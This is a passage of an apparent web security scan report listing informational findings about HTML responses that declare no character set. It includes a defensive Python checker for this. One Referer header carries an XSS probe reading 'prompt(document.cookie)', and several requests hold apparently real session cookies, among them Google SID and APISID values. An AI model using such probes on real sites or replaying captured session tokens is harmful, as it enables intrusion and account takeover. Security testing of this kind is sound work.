Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/$%7BSEG_IDS%7D

Request

GET /adi/ober.frontier/$%7BSEG_IDS%7D HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 622
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 06 Sep 2011 12:45:38 GMT
Expires: Tue, 06 Sep 2011 12:45:38 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.10. http://ad.doubleclick.net/adi/ober.frontier/product_119282623

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/product_119282623

Request

GET /adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 629
Date: Tue, 06 Sep 2011 12:50:49 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.11. http://ad.doubleclick.net/adi/ober.frontier/product_undefined

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/ober.frontier/product_undefined

Request

GET /adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 629
Date: Tue, 06 Sep 2011 12:45:30 GMT

<HEAD><title>Click here to find out more!</title><script>if (document.all){setTimeout(" location.reload();",60000);}</script></HEAD><!-- Rubicon Project tag -->
<!-- Site: Oberon (No Telecom) Zone
...[SNIP]...

24.12. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Request

GET /iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7&ad_type=iframe&ad_size=300x250&site=224114&section_code=14486084&cb=1315312187399365&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15sa69po3/M=787833.14486084.14323910.12559432/D=allmyfr/S=360632246:LREC/Y=YAHOO/EXP=1315319387/L=rUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7/B=ejW9Ptj8el8-/J=1315312187399365/K=nql_VTEk0rLg6_ewKQ00GQ/A=6284639/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!%!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~"; ih="b!!!!(!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE"; bh="b!!!#C!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!)!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!%=3]ih!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!$=3f.'"; path=/; expires=Thu, 05-Sep-2013 12:29:49 GMT
Set-Cookie: vuday1=4M6Eq4M6Eq!79C88CF`W; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=*YKly!79C86nkxc; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:29:49 GMT
Pragma: no-cache
Content-Length: 996
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10070732);}
</script><IFRAME SRC="ht
...[SNIP]...

24.13. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1394840Y52120110823224152&cid=1512429&pos=h&redir=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bW92NGptYihnaWQkYXkzOTlFU08yMlRwQVJwalRsLndqUXFiTWhkN2FrNW1GZEFBQW14USxzdCQxMzE1MzEzMTA0MTkzNTAxLHNpJDQ0NjMwNTEsdiQxLjAsYWlkJHRrcFc4VUplNXFBLSxjdCQyNSx5YngkUC5PSDNVZ1FtaGRTUV9HV1dQbFd3QSxyJDAscmQkMTZpNmRwbDFzKSk/1/*http://global.ard.yahoo.com/SIG=15kacfpj6/M=999999.999999.999999.999999/D=music/S=791000026:LREC/Y=YAHOO/EXP=1315320304/L=ay399ESO22TpARpjTl.wjQqbMhd7ak5mFdAAAmxQ/B=tkpW8UJe5qA-/J=1315313104251332/K=k1l.VZAYPvQ2T2sK4DlGjQ/A=3685707077155226847/R=0/X=6/*$CTURL$&time=2|12:45|-5&r=0.34970951941795647&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=43AC0400-C054-18FC-0309-F71007140101; PRca=|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GV12:2|GSur:3|#; PRpc=|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:45:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 6172
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=45AC0400-CF32-A440-020A-0900001F0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKgy*39173:2|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKgyAKLp:2|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Fqr0:2|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GV2B:2|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|Fqr0GV2B:2|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...

24.14. http://comcast-www.baynote.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: comcast-www.baynote.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: BNServer
Accept-Ranges: bytes
ETag: W/"162-1203630898000"
Last-Modified: Thu, 21 Feb 2008 21:54:58 GMT
Content-Type: text/html
Content-Length: 162
Date: Tue, 06 Sep 2011 12:22:46 GMT

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>HTTP Status 404</h1>
<p>The requested resource is not available</p>
</body>
</html>
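
Every response captured in this section is served as `Content-Type: text/html` with no `charset` parameter, and where the document head is visible it carries no `<meta charset>` either; the 404 page of 24.14 above is one complete instance. With no declared encoding the browser has to guess one, which is the condition that lets encoding-dependent XSS payloads (UTF-7 in older browsers) be interpreted as script. The Python below is an added example, not XSS.Cx or Burp output: it parses a raw HTTP/1.x response exactly as these entries show it and reports where, if anywhere, the character set is declared. The first sample is the 24.14 response copied from above; the other two are constructed variants of it, one with the charset in the header and one with it only in a `<meta>` tag.

```python
"""Report whether a raw HTTP response declares a character encoding.

Added example for this report section (not part of the XSS.Cx / Burp output).
A text/html response with no charset in the Content-Type header and no
<meta charset> in the document leaves the encoding to browser heuristics.
"""
import re
from typing import Dict, Optional, Tuple

# Response copied from entry 24.14 above (comcast-www.baynote.net /favicon.ico).
RESPONSE_NO_CHARSET = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: BNServer\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 162\r\n"
    "\r\n"
    "<html>\n<head>\n<title>Not Found</title>\n</head>\n<body>\n"
    "<h1>HTTP Status 404</h1>\n<p>The requested resource is not available</p>\n"
    "</body>\n</html>\n"
)

# Constructed variants (not from the page): the same page with the charset
# declared in the header, and with it declared only in a meta tag.
RESPONSE_HEADER_CHARSET = RESPONSE_NO_CHARSET.replace(
    "Content-Type: text/html", "Content-Type: text/html; charset=utf-8"
)
RESPONSE_META_CHARSET = RESPONSE_NO_CHARSET.replace(
    "<head>\n",
    '<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\n',
)

# Matches both <meta charset=...> and <meta http-equiv=... content="...; charset=...">
_META_CHARSET = re.compile(r"<meta\b[^>]*?charset\s*=\s*[\"']?([\w.:-]+)", re.I)


def split_response(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.x response into status line, headers and body.

    Header names are lower-cased; a repeated header keeps its first value.
    Accepts 'Name:value' with no space after the colon, as in the
    Set-Cookie headers of entry 24.13.
    """
    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    head = parts[0]
    body = parts[1] if len(parts) > 1 else ""
    lines = re.split(r"\r?\n", head)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a header line
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers, body


def media_type_and_params(content_type: str) -> Tuple[str, Dict[str, str]]:
    """Split 'text/html; charset=utf-8' into ('text/html', {'charset': 'utf-8'})."""
    media_type, *raw_params = content_type.split(";")
    params: Dict[str, str] = {}
    for param in raw_params:
        key, _, value = param.partition("=")
        if key.strip():
            params[key.strip().lower()] = value.strip().strip('"').lower()
    return media_type.strip().lower(), params


def header_charset(headers: Dict[str, str]) -> Optional[str]:
    """Charset declared in the Content-Type header, or None."""
    content_type = headers.get("content-type")
    if content_type is None:
        return None
    return media_type_and_params(content_type)[1].get("charset")


def meta_charset(body: str) -> Optional[str]:
    """Charset declared by a <meta> tag in the HTML body, or None."""
    match = _META_CHARSET.search(body)
    return match.group(1).lower() if match else None


def charset_declaration(raw: str) -> Dict[str, object]:
    """Describe where (if anywhere) an HTML response declares its charset."""
    status, headers, body = split_response(raw)
    media_type = media_type_and_params(headers.get("content-type", ""))[0]
    is_html = media_type in ("text/html", "application/xhtml+xml")
    hdr = header_charset(headers) if is_html else None
    meta = meta_charset(body) if is_html else None
    return {
        "status": status,
        "media_type": media_type,
        "is_html": is_html,
        "header": hdr,
        "meta": meta,
        "declared": is_html and (hdr is not None or meta is not None),
    }


def missing_charset(raw: str) -> bool:
    """True when the response is HTML and declares no charset anywhere."""
    result = charset_declaration(raw)
    return bool(result["is_html"]) and not result["declared"]


if __name__ == "__main__":
    samples = {
        "24.14 as captured": RESPONSE_NO_CHARSET,
        "charset in header": RESPONSE_HEADER_CHARSET,
        "charset in <meta> only": RESPONSE_META_CHARSET,
    }
    for label, raw_response in samples.items():
        info = charset_declaration(raw_response)
        print(f"{label:24} header={info['header']!s:8} meta={info['meta']!s:8} "
              f"missing={missing_charset(raw_response)}")
```

Run over a saved proxy capture, `missing_charset` flags exactly the condition every entry in this section exhibits; the header value is the authoritative one, so a fix should add `charset=` to the `Content-Type` header rather than rely on the `<meta>` tag alone.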

24.15. http://games.frontier.com/graphics/frontier/1000/site/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /graphics/frontier/1000/site/favicon.ico

Request

GET /graphics/frontier/1000/site/favicon.ico HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 8
Date: Tue, 06 Sep 2011 12:45:41 GMT
Connection: close

404 oops

24.16. https://login.frontier.com/webmail/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...

24.17. https://login.frontiermobile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Request

GET /?sae_nexthop_template=freetrial HTTP/1.1
Host: login.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:38 GMT
Server: Apache/2.2.16 (Debian)
Expires: -1
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 16142
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>FrontierMobile :
...[SNIP]...

24.18. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Tue, 06 Sep 2011 12:55:25 GMT
Expires: Tue, 06 Sep 2011 12:55:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

24.19. http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
Path:   /intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.a7jekt64iaasm.m2lwolbkh2abdsnv.if.v4.ipv6-exp.l.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
